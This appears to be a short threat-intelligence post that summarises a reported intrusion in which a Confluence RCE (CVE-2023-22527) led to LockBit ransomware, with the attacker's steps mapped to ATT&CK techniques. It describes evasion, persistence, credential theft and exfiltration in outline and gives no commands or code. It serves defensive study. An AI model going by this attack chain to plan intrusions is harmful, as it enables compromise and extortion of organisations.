Confluence Exploit Leads to LockBit Ransomware

Mar 21, 2025

Threat Actor:

LockBit ransomware group/affiliate or ShadowSyndicate ransomware group (based on IP address associations with AnyDesk C2 server)

Tactics, Techniques, and Procedures (TTPs):

Initial Access:

T1190 Exploit Public-Facing Application: Exploitation of CVE-2023-22527 (Confluence RCE vulnerability) on an exposed Windows Confluence server.

Execution:

T1218.005 Signed Binary Proxy Execution: Mshta: Used mshta.exe to download and execute a Metasploit stager.
T1059.001 Command and Scripting Interpreter: PowerShell: Used PowerShell for various tasks, including downloading AnyDesk, deobfuscating and executing shellcode, clearing event logs and disabling Windows Defender.

Persistence:

T1543.003 Create or Modify System Process: Windows Service: Installed AnyDesk as a service for persistent remote access.
T1136.001 Create Account: Local Account: Created a new local account (“backup”) and added it to the Administrators group.

Privilege Escalation:

Confluence RCE provided SYSTEM access.
Exploited the initial access to create a local administrator account.
T1068 Exploitation for Privilege Escalation: Used the Confluence RCE vulnerability to gain SYSTEM privileges initially.

Defense Evasion

T1562.001 Impair Defenses: Disable or Modify Tools: Turned off Windows Defender via the GUI.
T1070.001 Indicator Removal on Host: Clear Windows Event Logs: Cleared Windows event logs on the file server.
Deleted files they brought into the environment.

Command And Control

T1573.001 Encrypted Channel: Symmetric Cryptography: Metasploit communication was likely encrypted.
T1071.001 Application Layer Protocol: Web Protocols: Used HTTP for downloading the Metasploit stager.
T1219 Remote Access Software: Used AnyDesk for remote access and control.

Exfiltration

T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage: Used Rclone to exfiltrate data to MEGA.io cloud storage.

Modus Operandi (MO):

Exploit Confluence vulnerability (CVE-2023-22527).
Deploy Metasploit stager and AnyDesk for persistent access.
Use Mimikatz and other tools to steal credentials.
Deploy LockBit ransomware using PDQ Deploy for automated distribution, and manual execution on critical servers.

Report Credit:

https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/

Discussion about this post

No posts

#nojs-banner { position: fixed; bottom: 0; left: 0; padding: 16px 16px 16px 32px; width: 100%; box-sizing: border-box; background: red; color: white; font-family: -apple-system, "Segoe UI", Roboto, Helvetica, Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol"; font-size: 13px; line-height: 13px; } #nojs-banner a { color: inherit; text-decoration: underline; } This site requires JavaScript to run correctly. Please turn on JavaScript or unblock scripts